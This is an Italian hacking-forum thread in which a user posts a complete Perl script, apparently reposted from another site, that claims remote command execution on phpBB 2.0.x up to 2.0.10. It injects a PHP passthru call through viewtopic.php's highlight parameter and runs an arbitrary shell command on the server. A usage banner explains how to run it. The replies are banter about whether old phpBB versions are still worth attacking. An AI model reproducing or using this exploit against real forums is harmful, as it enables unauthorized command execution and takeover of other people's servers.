phpbb 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10 exploit

[loddo]

Non mi assumo nessuna responsabilità sull'uso che facciate e posto il materiale solo a scopo informativo

quote:
MATERIALE PRESO DA EUROHACKERS.IT

quote:
phpbb 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10 exploit





#!/usr/bin/perl
if (@ARGV < 4)
{
print q(############################################################
phpBB <=2.0.10 remote command execution exploit
############################################################
usage:
r57phpbb2010.pl [DIR] [NUM] [CMD] params: [URL] - server url e.g. [url]www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
############################################################
);
exit;
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];

$serv =~ s/(http://)//eg;
print "*** CMD: [ $cmd ]rn";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILEDrn";

print $socket "GET $path HTTP/1.1n";
print $socket "Host: $servn";
print $socket "Accept: */*n";
print $socket "Connection: closenn";

$on = 0;

while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILEDrn";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn";

### EOF ###

E' DA COMPILARE IN PERL

 

[Arkangelo]

Bravo loddo,
Da dove l'hai preso?

 

[ThePhunk94]

bel exploit

 

[alienstyle]

Bell'exlpoit x]

 

[loddo]

grazie

 

[alienstyle]

prego, ma io sinceramente non ho capito a cosa serve... O_O

 

[tintiton]

mi spiegate cose?

 

[Vincy]

Completamente Inutile

 

[loddo]

perchè?

 

[FedeStyle]

Se lo dice vinci e e vero xD cmq sara inutile x ke e x la versione vekkia di phpbb ormai ce la 3 e la phpbb2 .22

quindi e na cazzata e mejo un exploit avanzato

 

[Arkangelo]

nana, moooooolti usano la 2.0.10 infatti, mi sembra che la 2.0.6 è quella di Altervista e.. molti la usano

 

[FratelloDiPeppe]

Completamente Inutile

... quoto

 

[.Stefano96.]

Se lo dice vinci e e vero xD cmq sara inutile x ke e x la versione vekkia di phpbb ormai ce la 3 e la phpbb2 .22

quindi e na cazzata e mejo un exploit avanzato

si am ala 3 è sconsigliata d pubblicare è una beta

 

[Walter 22]

Se la usate sul mio forum vi metto conto l' FBI

 

[User186]

si ok ma cn tt le cazzate di Exploit uno va ad usare qll in perl??
Cmq ho già trovato ed istallato le mod contro shell in Perl

 

[loddo]

bravo negroso xD comunque presto ne posto altri

 

[Carloxs]

Se lo dice vinci e e vero xD cmq sara inutile x ke e x la versione vekkia di phpbb ormai ce la 3 e la phpbb2 .22

quindi e na cazzata e mejo un exploit avanzato

ecco un lecchino di vincy

 

[User186]

ahahahhaa

 

[Markismanettone]

carlo carlo carlo ma xke fai il cojione? fede nn e' lekkino nn ne ha bisogno caro magari sei tu ke in fondo nascondi un cuore lekkino uhm.. chi lo sa con carlo e' tutto possibile.. basta ricordarti su msn mio strillavi ke volevi ke entravo mi lekkinavi poi kuando e' venuta fuori kuella bella cosetta nn ti 6 fatto + vedere caro il mio "anti lekkino"

 

[Francescop93]

Utente Markismanettone bannato per 3 giorni.